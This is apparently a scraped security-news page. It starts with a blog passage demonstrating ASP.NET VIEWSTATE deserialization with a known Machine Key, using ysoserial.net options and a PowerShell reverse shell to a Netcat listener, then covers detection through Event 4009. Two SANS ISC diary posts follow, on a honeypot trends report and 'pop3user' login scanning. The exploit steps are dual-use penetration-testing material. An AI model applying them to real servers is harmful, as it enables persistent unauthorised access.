- A malicious VIEWSTATE parameter can be used with *any* ASPX script on the server, it does not need to be the originally vulnerable one. There are some caveats on how to produce a valid VIEWSTATE parameter based on application path, but there are many other resources that explain how to do this.
To reiterate – once an attacker has a valid Machine Key they basically have a backdoor to the IIS server that they can use at any point in time, as long as the Machine Key has not been changed!
PoC || GTFO
Let’s demonstrate this. I have a very simple application that allows a user to input their name (and will use it in a diary in the future as well), that looks like this:
When the Submit button is clicked, the following request is sent:
Now, the IIS server that I have setup is using automatically generated Machine Keys, to make exploitation a bit more interesting (notice I didn’t say difficult). When using the script that Soroush posted, the following information can be again seen:
This leaves us with all information needed to exploit this server.
We will use ysoserial.net to do this, specifically with following options:
- The plugin we will use will be ViewState, which will allow us to generate a malicious VIEWSTATE object, provided with know the Machine Key
- The gadget chain will be TextFormattingRunProperties – it usually generates the shortest payload and supports LosFormatter
- The command will be our PowerShell which will connect to our Netcat listener
- Finally we will need to provide the following:
- Validation key is the Machine Key from above. I will be using an application specific validation key as we can see that, besides Machine Key being automatically generated, the server is using IsolateApps so every application has its own Machine Key, which is derived from the initial one
- Validation algorithm will be HMACSHA256
- My path and apppath will correspond to the application I am attacking (see Soroush’s post for more information about this)
- Finally I am using the algorithm suitable for .NET 4.0
All we need to do now is go back and resend the request, but this time with our malicious VIEWSTATE object:
The response will be 500 Internal Server Error, but that’s what we want:
And we get our reverse shell happy dance:
Finally, the attacker can now use this malicious VIEWSTATE object on any page that belongs to this application, no matter what other parameters are sent as IIS will first try to deserialize the received VIEWSTATE object. And that’s their persistent backdoor.
Detection
IIS will at least log an event when Viewstate verification has failed. Failed here does not mean that MAC was incorrect (that is silently ignored), but when the verification process failed, which will happen when deserialization is exploited.
Full VIEWSTATE object is logged so that also allows for inspection on what has happened. If you do not already, make sure that you are monitoring Event Code 4009 in Windows Application code. Such an event will look as shown below:
INFIGO IS | An Allurity Group member
0 Comments
New Feature: Daily Trends Report
I implemented a new report today, the "Daily Trends" report. It summarizes noteworthy data received from our honeypot. As with everything, it will improve if you provide feedback :)
There are two ways to receive the report:
- E-Mail: Sign up at https://isc.sans.edu/notify.html
- JSON/HTTP: You may also just download the raw JSON data for the report at https://isc.sans.edu/feeds/trends.json
The sections of the report:
- Top 10 newly registered domains, based on our domain score (the higher, the more suspect)
- Top 10 URLs: The top 10 newly seen URLs from our web honeypot.
- Top 10 New SSH/Telnet usernames: Usernames our Cowrie honeypots have not seen before.
- Top 10 Trending ports
The layout will be refined for sure. Let me know I the data is useful.
Can't receive the email? E-mail delivery has always been an issue, which is why we offer the JSON report as well.
--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Social Media/Contact Links|
0 Comments
Legacy May Kill
Just saw something that I thought was long gone. The username "pop3user" is showing up in our telnet/ssh logs. I don't know how long ago it was that I used POP3 to retrieve e-mail from one of my mail servers. IMAP and various webmail systems have long since replaced this classic email protocol. But at least this one attacker is counting on someone still having a "pop3user" configured.
The passwords attempted are the classics "pop3user" and "123456". The sole IP address scanning for this username is 193.32.162.157. The IP address is part of AS47890, which is managed by Unmanaged (I am not making this up..)
route: 193.32.162.0/24
origin: AS47890
mnt-by: UNMANAGED
mnt-by: ro-btel2-1-mnt
created: 2022-11-21T17:07:38Z
last-modified: 2022-11-21T17:07:38Z
source: RIPE
The website for unmanaged.uk is blank, the network is probably unmanaged... not a fan of blocklists, but I would consider AS47890 a good candidate for a block.
pop3 still being used (maybe?), unmanaged networks... why are we wasting time trying to worry about 0-days?
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
2 Comments
0 Comments